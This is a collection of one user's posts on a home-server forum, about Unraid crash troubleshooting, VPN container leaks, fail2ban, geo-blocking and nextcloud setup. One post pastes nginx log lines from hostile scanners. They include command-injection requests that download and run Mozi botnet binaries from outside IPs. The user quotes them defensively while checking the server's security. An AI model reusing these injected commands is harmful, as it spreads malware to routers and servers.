ZekerPixels

Members
  • Posts

    23
  • Joined

  • Last visited

Everything posted by ZekerPixels

  1. I thought both ware cache drives where on the motherboard, but i just checked; 1 cache drive using the motherboard sata amd the other one is connected to LSI9211 The disk reported is just the disk is tries to write to, with the only consistent being the cache. Im sure the cache is messed up, it now reports 2TB (it is 1tb) anyways i need to figure out how i can copy everything for the cache to an external or something edit: Ok, the cache drive ending on 208 is definitely fucked. but I think I can safe most of the data for the other drive. Unfortunately it takes quiet some time because it about 500gb. EDIT UPDATE So far the issue is solved, what i have done is. After discovering the cache is the problem, making it crash every time something got written or read form it. I made a new usb, to start from fresh. Put one of the original cache disks as an array disk (btrfs) and tries to read the data of. The first disk did immediately crash again, but i could pull all the files from the second disk. So, basically it reinstalled everything the way it was before. I had backups of the dockers and a document with all the changes I made in the past. It took about 2 hours to set back everything to how it was before. I checked the latest files i copied for the cache and all files seam to be unharmed by this situation. Conclusion I don't think it was necessary to start for a fresh install, but it didn't take to much time and everything work as it supposed to.
  2. I have the parity disks removed from the array, otherwise I need to cancel the parity check every time. And we can also exclude it have anything to do with generating parity when moving to the array. 12:38 turn on syslog and reboot 12:41 start array 12:43 download something to cache only folder using a docker 12:45 Crashed and automatic reboot 12:48 start array 12:51 start mover 12:51 Crashed and automatic reboot 12:55 generate "diagnostics1", disable docker and reboot 12:58 start array (docker and vms are disabled) 12:00 start mover 13:02 Crashed and automatic reboot 13:05 generate "diagnostics2" turn off syslog and get the syslog file Oke, so the syslog contains 3 crashes; - At the time of the first crash, there is nothing in the syslog. - At the second crash, also nothing - At the third crash, a bunch of BTRFS errors. There is al least something going on with the cache, but could have been caused by the very frequent crashes.
  3. On what the issue could be, it can complete a parity sync without any issues. I would think temperature is good and also power is good, because during the parity check there more cpu utilization and all disks are doing something ofc requiring more power. I don't have an extra psu or any spares actually, so I cant really change out parts to try something. The syslog that i posted should contain two crashes. Anyways I will make a new one and this time writing down the time of events, give me like an hour.
  4. I had no solution or any clue on what the issue could be, so I made a fresh usb 6.9.2. Quickly setup my configuration, shares, ect. and it crashes. So, i have a fresh unraid install and having thesame issue as before. To me, that points to a hardware issue, what could to it. I removed the other files, these are the new diagnostics and syslog. I'm not sure of the time of the first crash, second one was on 02:20
  5. I also tough it could be the ram, so yes I have run memtest. With single sticks and both together, resulting in no errors after 8 passes in each configuration. Also the server can complete a parity check without any issues, if it would have been the memory is probably shouldn't be able to do that because with mover (or another method moving form cache to array) it crashes every time within a minute. The only weird line in the syslog is line 169, this is also close to the crash. But doesn't show anything because its also there when it doesn't crash. "ntpd[1758]: kernel reports TIME_ERROR: 0x41: Clock Unsynchronized" idk but /Settings/DateTime shows the correct time
  6. The array are 8TB and 2 4TB, Cache is 2 1TB disks. Eris are two different sized ssds 120gb and 240gb mirrored, so effectively having 120gb and yes it is using the default btrfs raid1. Appdata, domains and system is all on this pool.
  7. Yes, that would have been a great idea. Updated, this time with the array running.
  8. Hi all, The server has an problem, it crashes every time within a short time after running mover. I have been using this system with 6.9.2 from release and it worked fine before and I have already done the following; - parity check - docker safe permissions - fix common problems - disabled VMs - disabled Dockers - mover, unbalance, krusader - memtest86, no issues on a couple of passes With Vms and Dockers disabled it still crashed every time within a minute of invoking mover. I hope you guys have a idea what the issue could be Anyways thanks for all the help ZPx Updated: https://forums.unraid.net/topic/110753-692-mover-crashes-server/?tab=comments#comment-1010818
  9. I have never realy done anything with github, but gave it a try with a contribution of the translation for the Recycle Bin. If it doesn't show up or if anything is wrong let me know.
  10. I set pihole as dns on my pc and the domain requests are indeed coming form my pc and not unraid. When you click the list of indexers in the jackett webui, I copied all of those and made it into a blocklist. (not reliable, I know, just to test something out) Testing it again all the domains from jackett ui get a blocked status in pihole. Testing the indexers still work successfully with the domain blocked, indicating jackett is using the vpn. also pointing to the pc making the request is completely unnecessary.
  11. Quite late here as well, goodnight. One thing to note, it is not only with firefox. At first i thought i misconfigured something, but you saw those settings and I not doing something stupid in the config. I'm also not doing something really advanced, just pihole. There are lots of people using it, someone would have noticed if its a big issue. Thats why I suspected the browser at first, and why I tried some different browsers and on different devices. I a bit out of things to try for now, maybe I can come up with something tomorrow. The first time i noticed the domain request i was playing with sonarr etc. and though hey that's not right. I can however not directly see the source of the request in pihole, because all have 192.168.1.1 (the router) as client. So, I see no difference in pihole between the server or pc. I think i can get it that way without to much hassle, will try I tomorrow. Its a bit weird the browser pings all those domains. I had the webui still open, I just checked, clicking on "test all" and it pops up in pihole as well as using "manual search". So, that would still originate form the pc. I set pihole as dns on my pc and check the origin. I'm sorry keeping you up at night (never thought I would say that) worrying about your container. Thanks for support and effort making sure there are no issues with the container itself.
  12. It was remove fairly quickly, but i could imagine using a bit more difficult password. It sounded a bit like the default welcome123 password company admins tend to use. My jackett log ends with the following, its a fresh install with everything on default settings. Hosting environment: Production Content root path: /usr/lib/jackett/Content Now listening on: http://[::]:9117 Application started. Press Ctrl+C to shut down. I think the proxy settings binhex referred to are in the webui @binhex previous post I discovered something, I mentioned using firefox on my pc to access the jackett webui and the domains show up in pihole. On thesame pc I used a differend broser to access the jackett webui, chrome and edge, now it doesnt show up in pihole. Interesting, doing thesame on my phone using chrome and it does show up in pihole. I fired up a vm, trying chrome, it shows up i pihole.
  13. I removed the privoxy container by accident, also removed the jackett container and also deleted the folders in appdata. reinstalled both using thesame settings in the template as previous and put the openvpn files back. When installed, let it run for a bit and restarted, stopped both containers and made sure privoxyvpn is started first. A quick check in the console returns the vpn ip. I did not change any other settings. (buy default proxy is det to disabled in jackett) Now on my pc using the firefox browser, I go to ip:9117 and check pihole and doesnt show any of the indexers now. so, now i click on add indexer, where you get the big list of indexers. I dont do anything else and check pihole, pihole now lists every domain 0 to z from jackett. If a indexer is added, and i access the web ui, pihole just list the added indexer.
  14. I didn't want to post a huge picture collection here, so i uploaded them to https://imgur.com/a/qGysAeM. In jackett the proxy is set to disabled, so it should take the network from unraid which point to the privoxy container. To be sure it started up the right way, I rebooted the server, started privoxyvpn and waited till it said listening to port before starting jackett.
  15. @binhex Sorry to tag you, but I don't get it. Yes, I have added the ADDITIONAL_PORTS and it works, but I'm questioning if the pass trough really uses the vpn. Incidentally you mentioned an update, so I forced the update because it maybe solved the issue I had, but unfortunately it didn't make a difference. I have pihole set as a dns in the router and I can hide everything from it using the vpn e.g. with the provided vpn app. But pihole keeps showing domains comming from the passed through container, e.g. opening the webUI of binhex-jackett gets me a whole list of domains in pihole, I my mind it shouldn't do that. right? If I do thesame for eg a firefox docker, nothing showes up in pihole, as expected. when opening the jackett console and ping a website, it also doesnt show up. I dont understand why this would differ openinging the webui of jackett and maybe others. I have also tried it with your other vpn dockers, which leads to the same result. (I understand it uses the same code, so that wouldn't be a surprise) I'm only talking about the pass trough, everything to do with torrents is hidden by the vpn. Just to be sure I didn't mess something up, I removed everything, the images, appdata and started from scratch. Basically I'm following along with SpaceinvaderOne, doing this; https://www.youtube.com/watch?v=znSu_FuKFW0 and in addition adding to the ADDITIONAL_PORTS. as also described in your VPN FAQ A24. - I get the vpn setup, credentials and openvpn files. "curl ifconfig.io", shows the vpn ip. - added the port to ADDITIONAL_PORTS and pass trough like also showed by mbc0 a couple of posts back, because otherwise it doesnt know what to with it. - checking the passed trough container e.g. "binhex-jackett" with network set as "--net=container:binhex-privoxyvpn" with "curl ifconfig.io", also shows the vpn ip. - When I access the passed trough container, pihole directly shows all the domains it accesses.
  16. Hey all, I installed privoxyvpn and also played arround with delugevpn and qbittorrentvpn, all ofc binhex. I put the files in the openvpn folder, vpn works. Now i want to pass it trough to another container. Spaceinvaderone has a video about it, I enabled privoxy and entered the proxy information in the webinterface of the container. I also tried another method; I also tried to add the port of the container I want to pass trough to the binhexvpn container. In the container I want to pass tough, put the network to none and put "--net=container:binhex-privoxyvpn" to the extra parameters. I think it works, "curl ifconfig.io" in the console and I get the vpn ip. So, here is the thing; I also have pihole running and set as dns on the router, so I can see the domains which get requested. Lets say I want to passtrough jackett (this is a good one to test, because it pings websites I otherwise dont use, so easy to spot). So both methodes mentioned before, when I open the webinterface of the passed trough container (jackett), I can see every domain it want to access in pihole. In my logic this shouldn't happen because of the vpn connection, am I misconfiguring or misunderstanding something? Thanks, Edit: I tried entering the proxy information in my browser, and check what my ip is. When I enter the infomation of PrivoxyVPN it doesn't work. When I try the same for delugevpn it does work. (server ip and port 8118) Edit: removed and deleted everything. Tried it again, and it works. Edit: it worked for a while and started leaking everything again, trying the update now.
  17. [SOLVED] Hey all, I'm still trying to setup swag and nextcloud, to my liking. I know nextcloud has some burteforce protection (25 second timeout) on login attempts, but i want ban those ips. So, use fail2ban, since it already in swag. I found a some information about it, and basically you want to pass the nginx log on nextcloud to fail2ban in the swag container. In fail2ban you would configure a filter for that logfile on which it triggers. (see linked post) The problem is what gets written in the access log of nextcloud "\nextcloud\log\nginx\access.log". If i make a couple of wrong login attempts from an outside ip, I kind of expected something like "login failed" but it doenst mention anything like that. The nexcloud documentation, also shows a filter looking at "login. failed" https://docs.nextcloud.com/server/19/admin_manual/installation/harden_server.html?highlight=fail2ban Thanks, Edit: wrong log file, I needed nextcloud.log located in host pasth 2 I set in the config. Thank you, Glasti
  18. Hi all, I have setup swag, nextcloud with my own domain, it gets the certificates and geoip blocked with maxminddb to only my country. I'm trying to understand what is happening and what gets returned to bots ect. and ofc have some questions of which I have some difficulty finding a answer. 1. When I vpn to some county and try to access mydomain, it gets blocked and I'm returned a 444. I think that sound good. So, I was expecting to see the same response to requests from another country in the log, but that is not the case. To IPs I checked which are from outside the country, I see 200 and 301 get returned and not 444. I don't get why it is different. 2. I have set fail2ban to 2 retries, a day find- and a week for bantime (aka things should get blocked). (I have some ideas for a better setting, but first I want to see it working on something which isn't me) I was expecting some to get blocked on a banlist of sorts, maybe I'm stupid but where can I find what got blocked? or does it get reset at reboot? Thanks, Edit: 1. still dont know 2. fail2ban in not configured right https://forums.unraid.net/topic/48383-support-linuxserverio-nextcloud/page/177/?tab=comments#comment-947025
  19. My device settings look totally different, but to me it looks like you are forwarding 180 to 180 and 4443 to 4443 instead of 80 to 180 and 443 to 4443. The scrceenshot is verry cropped so maybe its on there, but it should state the ports 80 and 443 someware in the port forward. What you can do is change the ip in the forward to your pc, and check if the ports are indeed open.
  20. of course its in /appdata/swag/log/nginx/access.log I understand the bot searching for something unsecured, as long as its secured it doesnt realy do anything. But I'm trying to understand what is happening and I want to be conviced it is secured before actualy using it. And I realy want to have geo blocking working, it doesnt hurt using it and https://www.spamhaus.org/statistics/botnet-cc/ well those get blocked. But kerbynet I mentioned, turns out to be an old router exploit.
  21. Hi all, Over the weekend is setup swag and nextcloud, following spaceinvaderone's guides. (https://scan.nextcloud.com/, gives all A+) I got everything working using my own domain (nexcloud.mydomain.com). I'm not a specialist but, so I'm not very confident about the security. So, I decided to let it running for about 20hrs, and check the logs and enter the ips on abuseipdb.com. I filtered all my activities out and am left with 158 lines in ngix log. Here and example: https://www.abuseipdb.com/check/74.120.14.53 https://www.abuseipdb.com/check/180.163.220.5 https://www.abuseipdb.com/check/180.163.220.68 https://www.abuseipdb.com/check/27.115.124.70 https://www.abuseipdb.com/check/192.241.215.11 Next some lines, of which non are from my ips. I understand the GET background, logo, ect. But kerbynet and wget from some ip, don't sound good. GET / HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 POST /GponForm/diag_Form?images/ HTTP/1.1 /tmp/gpon80&ipv=0 POST /boaform/admin/formLogin HTTP/1.1 400 0 - GET /portal/redlion HTTP/1.1 HEAD http://112.124.42.80:63435/ HTTP/1.1 CONNECT 112.124.42.80:443 HTTP/1.1 HEAD http://110.242.68.4/ HTTP/1.1 CONNECT 110.242.68.4:443 HTTP/1.1 POST /HNAP1/ HTTP/1.0 \x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\x11\xDFJ\x5CN\x8F\xA0\x89[\x9A\x84i=\x8A\x8FA\xEB\x98\xE3\xDB\xFDQ\xD1Iw\xFD\xED HEAD /robots.txt HTTP/1.0 GET /login HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.251:50078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 GET /actuator/health HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 OPTIONS / HTTP/1.1 HEAD /epa/scripts/win/nsepa_setup.exe HTTP/1.1 HEAD / HTTP/1.0 GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1 @\x00\x00\x00y0\x12\xD9\x9E9Q\x90\x8A\xED\xEE`\xCC\xB3\xD6| \x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr GET /hudson HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1 GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.99.138.110:45592/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 GET / HTTP/2.0 http://baidu.com/ GET /login HTTP/2.0 http://baidu.com/ GET / HTTP/2.0 GET /login HTTP/2.0 GET /apps/files_rightclick/css/app.css?v=46c85d58-8 HTTP/2.0 GET /core/css/guest.css?v=c3182750-8 HTTP/2.0 GET /apps/files_videoplayer/js/main.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/files_fileinfo.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/files_client.js?v=c3182750-8 HTTP/2.0 GET /apps/files_sharing/js/dist/main.js?v=c3182750-8 HTTP/2.0 GET /apps/files_pdfviewer/js/files_pdfviewer-public.js?v=c3182750-8 HTTP/2.0 GET /apps/files_rightclick/js/script.js?v=c3182750-8 HTTP/2.0 GET /apps/files_rightclick/js/files.js?v=c3182750-8 HTTP/2.0 GET /apps/theming/js/theming.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/main.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/login.js?v=c3182750-8 HTTP/2.0 GET /js/core/merged-template-prepend.js?v=c3182750-8 HTTP/2.0 GET /core/js/oc.js?v=c3182750 HTTP/2.0 GET /apps/theming/styles?v=8 HTTP/2.0 GET /apps/theming/image/logo?useSvg=1&v=8 HTTP/2.0 GET /apps/accessibility/css/user-a82fd95db10ff25dfad39f07372ebe37 HTTP/2.0 GET /core/img/actions/confirm-white.svg?v=2 HTTP/2.0 GET /core/img/loading-dark.gif HTTP/2.0 GET /core/img/actions/toggle.svg HTTP/2.0 GET /apps/theming/image/logo?v=8 HTTP/2.0 GET /csrftoken HTTP/2.0 GET /apps/theming/image/background?v=8 HTTP/2.0 GET /csrftoken HTTP/2.0 GET /apps/theming/favicon?v=8 HTTP/1.1 GET /csrftoken HTTP/2.0 Are there some obvious things I forgot to do? considering the ip locations, geo blocking wouldn't be a bad idea. I dont leave the country much, so blocking about the whole world exept 2/3 countys would probably be an option. Thanks, edit: found something on geo blocking https://technicalramblings.com/blog/blocking-countries-with-geolite2-using-the-letsencrypt-docker-container/ ofc, running into issues, I'm missing something verry obvious.
  22. [SOLVED] Hi all, I'm trying to setup nextcould and swag, so i can acces it from my own domain. I can't find why I don't get it working, it's probably something very simple and hopefully someone can point me into the right direction. When I try to access nexcloud in the browser via nextcloud.mydomain.com, I get: Internal Server Error The server encountered an internal error and was unable to complete your request. Please contact the server administrator if this error reappears multiple times, please include the technical details below in your report. More details can be found in the webserver log. This is the error I get from the nextcloud container, by clicking on log on the docker page: PHP Fatal error: Uncaught Error: Call to a member function getLogger() on null in /config/www/nextcloud/cron.php:162 Stack trace: } How I set it up, is of course according to the spaceinvaderone video. For setting up swag, I have the custom proxy network, port forwards and entered my own domain. This is working, the log showed getting a certificate and ends on server ready. And I made the subdomain.conf without changes form the sample, because I will also be using nextcloud.mydomain.com. Setting up nextcloud works, till the point where you acces it via your own domain. (also at this point clicking on webUI gives the same error) So I expect the config.php file, this is also the part which is differend from the video, because of swag instead of LetsEncrypt. This is the nextcloud config.php; <?php $CONFIG = array ( 'memcache.local' => '\\OC\\Memcache\\APCu', 'datadirectory' => '/data', 'instanceid' => '###', 'passwordsalt' => '###', 'secret' => '###', 'trusted_domains' => 'trusted_proxies' => ['swag'], array ( 0 => '10.10.10.10:444', 1 => 'nextcloud.mydomain.com', ), 'overwrite.cli.url' => 'https://nextcloud.mydomain.com/', 'overwritehost' => 'nextcloud.mydomain.com', 'overwriteprotocol' => 'https', 'dbtype' => 'mysql', 'version' => '20.0.6.1', 'dbname' => 'db name from mariadb', 'dbhost' => '10.10.10.10:3306', 'dbport' => '', 'dbtableprefix' => 'oc_', 'mysql.utf8mb4' => true, 'dbuser' => 'user name from mariadb', 'dbpassword' => 'password', 'installed' => true, ); Thanks, Edit: I found some post on a russian forum, that mentiones the same error, pointing to a syntax error in the nextcloud config file. I copied and modified the file using nano in the terminal, this should be good, rigth? I will try to use notepad++ to see if it makes a differnce. Edit: Omg, I'm stupid. Look where I placed the trusted proxies, it fucked up the domains array.